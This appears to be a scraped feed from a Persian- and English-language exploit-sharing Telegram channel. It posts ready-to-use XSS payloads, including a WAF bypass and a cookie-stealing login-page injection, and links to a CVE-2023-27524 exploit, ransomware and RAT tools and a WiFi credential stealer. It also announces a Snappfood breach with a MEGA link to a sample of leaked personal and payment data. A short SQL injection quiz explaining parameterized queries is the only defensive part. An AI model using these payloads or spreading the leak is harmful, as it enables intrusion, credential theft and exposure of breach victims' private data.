Marijuana Exploit 🍀
⬇️ Download
🔒
#Exploit #Bot
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/LearnExploit
📢 T.me/BugCod3
@LearnExploit
#Exploit #Bot
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6🆒3👎2👍1
👍5❤1
Akamai GHost Bypass
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡2👍2🆒1
Payload XSS on login page:
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
');\\</script><script>alert(document.cookie)</script>('%00tst@tst.com.br
#XSS #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥4⚡1🆒1
Blue Team Tools - A collection of scripts, tools. and configs for various OS'es and applications
Github
#pentesting #Blue_Team
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#pentesting #Blue_Team
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - WGU-CCDC/Blue-Team-Tools: A collection of scripts, tools. and configs for various OS'es and applications, all free and…
A collection of scripts, tools. and configs for various OS'es and applications, all free and or open-source, to assist in impromptu Blue-Team defense under an active threat. - WGU-CCDC/Blue...
اسنپفود هک شد!
به طور خلاصه موارد زیر در اختیار فروشنده قرار داره :
- اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ...
- اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره تلفن و ...
- اطلاعات بیش از ۱۸۰ میلیون دستگاه همراه شامل: نوع و مدل دستگاه، پلتفرم، توکن، فروشگاه نصب برنامه و ...
- اطلاعات بیش از ۳۶۰ میلیون سفارش شامل: آیپی سفارش دهنده، آدرس دریافتی، تلفن دریافتی، شهر، مدت زمان دریافت، نام و نام خانوادگی، مشخصات فروشگاه یا رستوران، قیمت، محصول و ...
- اطلاعات بیش از ۳۵ هزار پیک شامل: نام، نام خانوادگی، شماره تماس، کد ملی، شهر و ...
- اطلاعات بیش از ۶۰۰ هزار پرداخت سفارش شامل: نام کامل صاحب کارت، نام کامل مشتری، شماره تماس، شماره کارت، نام بانک و ...
- اطلاعات بیش از ۱۶۰ میلیون سفر انجام شده توسط پیک شامل: نام کامل مبدا و مقصد، آدرس مبدا و مقصد، تلفن مبدا و مقصد، موقعیت جغرافیایی مبدا و مقصد، تاریخ و ...
- اطلاعات بیش از ۲۴۰ هزار Vendor شامل: نام کامل، آدرس، تلفن، ایمیل، موقعیت مکانی GPS، نام مدیریت مجموعه و ...
- اطلاعات بیش از ۸۸۰ میلیون سفارش محصول
سمپل:
https://mega.nz/file/0OdnDI7Q#tqpjOn6Xrg8tJhgkNh0W1szRZWe4adlHjrVPgf6UhPM
#leak #news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
به طور خلاصه موارد زیر در اختیار فروشنده قرار داره :
- اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ...
- اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره تلفن و ...
- اطلاعات بیش از ۱۸۰ میلیون دستگاه همراه شامل: نوع و مدل دستگاه، پلتفرم، توکن، فروشگاه نصب برنامه و ...
- اطلاعات بیش از ۳۶۰ میلیون سفارش شامل: آیپی سفارش دهنده، آدرس دریافتی، تلفن دریافتی، شهر، مدت زمان دریافت، نام و نام خانوادگی، مشخصات فروشگاه یا رستوران، قیمت، محصول و ...
- اطلاعات بیش از ۳۵ هزار پیک شامل: نام، نام خانوادگی، شماره تماس، کد ملی، شهر و ...
- اطلاعات بیش از ۶۰۰ هزار پرداخت سفارش شامل: نام کامل صاحب کارت، نام کامل مشتری، شماره تماس، شماره کارت، نام بانک و ...
- اطلاعات بیش از ۱۶۰ میلیون سفر انجام شده توسط پیک شامل: نام کامل مبدا و مقصد، آدرس مبدا و مقصد، تلفن مبدا و مقصد، موقعیت جغرافیایی مبدا و مقصد، تاریخ و ...
- اطلاعات بیش از ۲۴۰ هزار Vendor شامل: نام کامل، آدرس، تلفن، ایمیل، موقعیت مکانی GPS، نام مدیریت مجموعه و ...
- اطلاعات بیش از ۸۸۰ میلیون سفارش محصول
سمپل:
#leak #news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
mega.nz
File on MEGA
❤🔥7👎3❤2🤯2😁1
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-27524 ( Apache Superset Auth Bypass ) Exploit #CVE #Exploit #POC —————— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-27524 - Apache Superset Auth Bypass and RCE
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥2
سایته تارگت سینگل یا دابل کوتیشن رو وقتی دارید تسته xss میگیرید بلاک میکنه ؟ از پیلود زیر استفاده کنید ⚡️
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
</script><svg/onload=alert(0)>
#Xss #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2👍2❤1⚡1
0Day.Today | Learn Exploit | Zero World | Dark web |
اسنپفود هک شد! به طور خلاصه موارد زیر در اختیار فروشنده قرار داره : - اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ... - اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره…
😁19
❗️❔چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند.
💬گزینه هارو همراه با ذکر علت بفرمایید.
🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه.
توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال
گزینه ی ۱و۲ به دلیل ...
1- cursor.execute("SELECT id FROM users WHERE username = '" + username + "'");
2- cursor.execute("SELECT id FROM users WHERE username = '%s'" % username);
3- cursor.execute("SELECT id FROM users WHERE username = '{}'".format(username));
4- cursor.execute(f"SELECT id FROM users WHERE username = '{username}'");
5- cursor.execute("SELECT id FROM users WHERE username = '%s'", (username, ));
6- cursor.execute("SELECT id FROM users WHERE username = %(username)s", {'username': username});
👍1
┌──(LearnExploit㉿kali)-[~]
└─$ sudo rm -rf 2023
┌──(LearnExploit㉿kali)-[~]
└─$ sudo mkdir 2024
iliyahr , AT7 , R4DiKaLL , X0P4Sh4 , А.Хоссейни——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥13❤5🔥1
0Day.Today | Learn Exploit | Zero World | Dark web |
اسنپفود هک شد! به طور خلاصه موارد زیر در اختیار فروشنده قرار داره : - اطلاعات بیش از ۲۰ میلیون کاربر شامل: نام کاربری، پسورد، ایمیل، نام و نام خانوادگی، شماره موبایل، تاریخ تولد و ... - اطلاعات بیش از ۵۱ میلیون آدرس کاربر شامل: موقعیت GPS، آدرس کامل، شماره…
دیتای snappfood فروخته نشده دوستان هم پست و هم سمپلی که گذاشتن رو هم پاک کردن
#news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
#news #snappfood
——————
0Day.Today
@LearnExploit
@Tech_Army
👍13😁2💔1
PingRAT - PingRAT secretly passes C2 traffic through firewalls using ICMP payloads
Github
#red_team #firewall_bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#red_team #firewall_bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3
Phirautee - A proof of concept crypto virus to spread user awareness about attacks and implications of ransomwares
Github
#ransomware #pentest
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#ransomware #pentest
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2👍2
0Day.Today | Learn Exploit | Zero World | Dark web |
♨️ چالش SQLi تمام شد. ❗️❔چند مورد از Query های زیر دارای آسیب پذیری SQLi نمی باشند. 💬گزینه هارو همراه با ذکر علت بفرمایید. 🔶برای 3 نفر که پاسخ صحیح رو داده باشند یک اکانت unlimit vpn یک ماهه داده میشه. توی کامنتا عدد مد نظر + علت رو بفرمایید. برا مثال…
♨️ جواب چالش :
💠 موارد 1 تا 4 دارای آسیب پذیری SQLi هستند. چرا ؟
ببینید دوستان یک ورودی ساده مثل '; SELECT 1=1; -- رو در نظر بگیرید
حالا بیایید توی چهار مورد اول جای USERNAME جایگذاری کنیم :
⚠️ نتیجه بعد از اجرا شدن
توی تمامی این چهار مورد یک تک کوتیشن اضافه میمونه که باعث ایجاد اررور میشه و در نتیجه Query دارای آسیب پذیری SQLi هستش.
علت اینکه این 4 مورد دارای آسیب پذیری هست اینکه برنامه نویس ورودی رو خودش به صورت دستی داره میسازه و خبری از پارامتریزه نیست.
اما تو دو مورد 5 و 6 این موارد رو تست کنیم :
نتیجه بعد از اجرا شدن
در این قسمت برنامه نویس با استفاده از آرگومان دوم اومده ورودی رو پارامتریزه کرده یعنی ورودی ابتدا وارد تابع mogrify() میشه و سپس وارد تابع _scape_args() میشه که باعث میشه Query پارامتریزه بشه.
اگه میخواهید در مورد این دو تابع اطلاعات بیشتری پیدا کنید :
🌐 GitHub
✅ برندگان چالش بر حسب میزان صحت پاسخ :
1. @Alirezkarimii
2. @arab1334
3. @xkdlee
دوستان جهت دریافت جایزه به آیدی @IRDefacer پیام بدن.
💠 موارد 1 تا 4 دارای آسیب پذیری SQLi هستند. چرا ؟
ببینید دوستان یک ورودی ساده مثل '; SELECT 1=1; -- رو در نظر بگیرید
حالا بیایید توی چهار مورد اول جای USERNAME جایگذاری کنیم :
⚠️ نتیجه بعد از اجرا شدن
1. cursor.execute("SELECT id FROM users WHERE username = '" '; SELECT 1=1; -- "'");
2. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
3. cursor.execute("SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
4. cursor.execute(f"SELECT id FROM users WHERE username = ''; SELECT 1=1; --'");
توی تمامی این چهار مورد یک تک کوتیشن اضافه میمونه که باعث ایجاد اررور میشه و در نتیجه Query دارای آسیب پذیری SQLi هستش.
علت اینکه این 4 مورد دارای آسیب پذیری هست اینکه برنامه نویس ورودی رو خودش به صورت دستی داره میسازه و خبری از پارامتریزه نیست.
اما تو دو مورد 5 و 6 این موارد رو تست کنیم :
نتیجه بعد از اجرا شدن
5. cursor.execute("SELECT id FROM users WHERE username = True");
6. cursor.execute("SELECT id FROM users WHERE username = True");
در این قسمت برنامه نویس با استفاده از آرگومان دوم اومده ورودی رو پارامتریزه کرده یعنی ورودی ابتدا وارد تابع mogrify() میشه و سپس وارد تابع _scape_args() میشه که باعث میشه Query پارامتریزه بشه.
اگه میخواهید در مورد این دو تابع اطلاعات بیشتری پیدا کنید :
🌐 GitHub
✅ برندگان چالش بر حسب میزان صحت پاسخ :
1. @Alirezkarimii
2. @arab1334
3. @xkdlee
دوستان جهت دریافت جایزه به آیدی @IRDefacer پیام بدن.
GitHub
PyMySQL/pymysql/cursors.py at main · PyMySQL/PyMySQL
MySQL client library for Python. Contribute to PyMySQL/PyMySQL development by creating an account on GitHub.
🔥5👍4
CVE-2023-21987 and CVE-2023-21991 - VirtualBox internals and exploitation
Github
#CVE #virtualbox
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #virtualbox
——————
0Day.Today
@LearnExploit
@Tech_Army
Qrious Secure
Analysis of VirtualBox CVE-2023-21987 and CVE-2023-21991
Introduction Hi, I am Trung (xikhud). Last month, I joined Qrious Secure team as a new member, and my first target was to find and reproduce the security bugs that @bienpnn used at the Pwn2Own Vancouver 2023 to escape the VirtualBox VM.
Since VirtualBox is…
Since VirtualBox is…
👍5👎1
Shell(@LearnExploit).py
1.2 KB
⚡4❤1✍1🤬1
WiFi password stealer - Simple Windows and Linux keystroke injection tool that exfiltrates stored WiFi data (SSID and password)
Github
#tools #wifi #stealer
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#tools #wifi #stealer
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - AleksaMCode/WiFi-password-stealer: Simple Windows and Linux keystroke injection tool that exfiltrates stored WiFi data…
Simple Windows and Linux keystroke injection tool that exfiltrates stored WiFi data (SSID and password). - AleksaMCode/WiFi-password-stealer
❤4
Please open Telegram to view this post
VIEW IN TELEGRAM
❤24👍4🤬3👎1